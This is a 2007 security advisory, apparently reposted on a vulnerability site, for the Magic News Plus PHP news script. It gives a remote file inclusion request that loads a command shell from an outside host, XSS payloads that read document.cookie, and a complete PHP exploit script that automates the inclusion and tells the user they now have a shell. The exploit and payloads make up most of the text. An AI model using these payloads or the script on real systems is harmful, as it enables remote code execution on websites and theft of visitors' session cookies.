Magic News Plus File Inclusion And Xss Vulnerabilitis

2007.03.07
Credit: HACKERS PAL
Risk: High
Local: No
Remote: Yes
CWE: N/A

Hello,, Magic News Plus File Inclusion And Xss Vulnerabilitis Tested on v1.0.2 Any Other Version maybe Infected Discovered By : HACKERS PAL Copy rights : HACKERS PAL Website : http://www.soqor.net Email Address : security (at) soqor (dot) net [email concealed] Remote File Inclusion preview.php?php_script_path=http://www.soqor.net/tools/cmd.txt?/ss&cmd=d ir Xss (Cross Site Scripting) news.php?GLOBALS[]=1&link_parameters="><script>alert(document.cookie);</ script> n_layouts.php?link_parameters="><script>alert(document.cookie);</script> Exploit:- #!/usr/bin/php -q -d short_open_tag=on <? /* /* Magic News PHP Code Execution Exploit /* This exploit should allow you to execute commands /* By : HACKERS PAL /* WwW.SoQoR.NeT */ print_r(' /**********************************************/ /* Magic News Command Execution */ /* by HACKERS PAL <security (at) soqor (dot) net [email concealed]> */ /* site: http://www.soqor.net */'); if ($argc<2) { print_r(' /* -- */ /* Usage: php '.$argv[0].' host /* Example: */ /* php '.$argv[0].' http://localhost/ /**********************************************/ '); die; } error_reporting(0); ini_set("max_execution_time",0); $url=$argv[1]."/"; $exploit="preview.php?php_script_path=http://www.soqor.net/tools/cmd.txt ?/soqor"; $page=$url.$exploit; Function get_page($url) { if(function_exists("file_get_contents")) { $contents = file_get_contents($url); } else { $fp=fopen("$url","r"); while($line=fread($fp,1024)) { $contents=$contents.$line; } } return $contents; } $newpage = get_page($page); if(eregi("Cannot execute a blank command",$newpage)) { Die("\n[+] Exploit Finished\n[+] Go To : ".$url."preview.php?php_script_path=http://www.soqor.net/tools/cmd.txt?/ soqor\n[+] You Got Your Own PHP Shell\n/* Visit us : WwW.SoQoR.NeT */\n/**********************************************/"); } Else { Die("\n[-] Exploit Failed\n/* Visit us : WwW.SoQoR.NeT */\n/**********************************************/"); } ?> #WwW.SoQoR.NeT


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top